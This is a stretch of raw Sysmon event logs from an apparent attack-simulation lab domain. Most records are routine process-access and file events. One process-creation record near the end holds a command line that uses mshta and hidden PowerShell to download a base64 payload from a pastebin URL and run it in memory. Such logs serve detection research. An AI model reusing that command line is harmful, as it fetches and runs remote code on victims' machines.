07:59:20.582{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106385Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.577{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106384Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.574{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106383Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.547{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106382Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.547{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106381Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.527{58E9C193-B458-615A-2402-00000000FC01}5420ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tqrsbhvx.sut.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106380Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.527{58E9C193-B458-615A-2402-00000000FC01}5420ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_13jpaggi.p32.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000106379Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:59:20.517{58E9C193-B458-615A-2102-00000000FC01}5760\PSHost.132778079601145058.5760.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x8000000000000000106378Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.513{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_13jpaggi.p32.ps12021-10-04 07:59:20.513 10341000x8000000000000000106377Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.487{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106376Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.487{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106375Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.486{58E9C193-B458-615A-2102-00000000FC01}5760ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u0zbezjy.oqq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000106374Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:59:20.477{58E9C193-B458-615A-1B02-00000000FC01}5292\PSHost.132778079600277451.5292.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000106373Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.477{58E9C193-B458-615A-2102-00000000FC01}5760ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_admqzffx.lcx.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106372Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.464{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_admqzffx.lcx.ps12021-10-04 07:59:20.457 10341000x8000000000000000106371Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.457{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106370Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.447{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DB770250B6757E786FCAF2558D6D137,SHA256=850D1BAAFE1439DD31D3B5A2A80715545B496CF8B000FDBFBBE0DFE6884D07F4,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000106369Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:59:20.447{58E9C193-B458-615A-1902-00000000FC01}5728\PSHost.132778079600118977.5728.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000106368Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.414{58E9C193-B458-615A-1B02-00000000FC01}5292ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_citrmab3.ifr.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106367Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.407{58E9C193-B458-615A-1B02-00000000FC01}5292ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2y5usdrl.lxj.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106366Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.397{58E9C193-B458-615A-1902-00000000FC01}5728ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ol4x5oxv.rmb.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106365Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.394{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106364Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.391{58E9C193-B458-615A-1902-00000000FC01}5728ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_l1zc5hoa.pc5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106363Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.372{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2y5usdrl.lxj.ps12021-10-04 07:59:20.372 11241100x8000000000000000106362Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.322{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_l1zc5hoa.pc5.ps12021-10-04 07:59:20.322 10341000x8000000000000000106361Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.322{58E9C193-B458-615A-2002-00000000FC01}53245964C:\Windows\system32\conhost.exe{58E9C193-B458-615A-2702-00000000FC01}5920C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106360Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.307{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106359Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.307{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106358Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.307{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106357Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.307{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082953Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:20.086{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09E7032B684DBF3A3B630EB4040D2199,SHA256=3BED6078F3BEA29AE9D252318B84FA54FD39258D1EE27DDE8D4D0C9747670503,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106356Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.307{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2702-00000000FC01}5920C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106355Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.302{58E9C193-B458-615A-1F02-00000000FC01}4243116C:\Windows\System32\cmd.exe{58E9C193-B458-615A-2702-00000000FC01}5920C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106354Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.307{58E9C193-B458-615A-2702-00000000FC01}5920C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B458-615A-1F02-00000000FC01}424C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106353Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.302{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106352Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106351Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.262{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106350Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 